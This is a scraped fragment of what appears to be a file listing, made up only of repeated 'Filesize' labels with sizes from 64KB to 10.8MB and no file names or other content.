Filesize
168KB
-
Filesize
432KB
-
Filesize
1.8MB
-
Filesize
432KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
256KB
-
Filesize
756KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
2.0MB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
2.0MB
-
Filesize
72KB
-
Filesize
248KB
-
Filesize
312KB
-
Filesize
756KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
5.2MB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
432KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB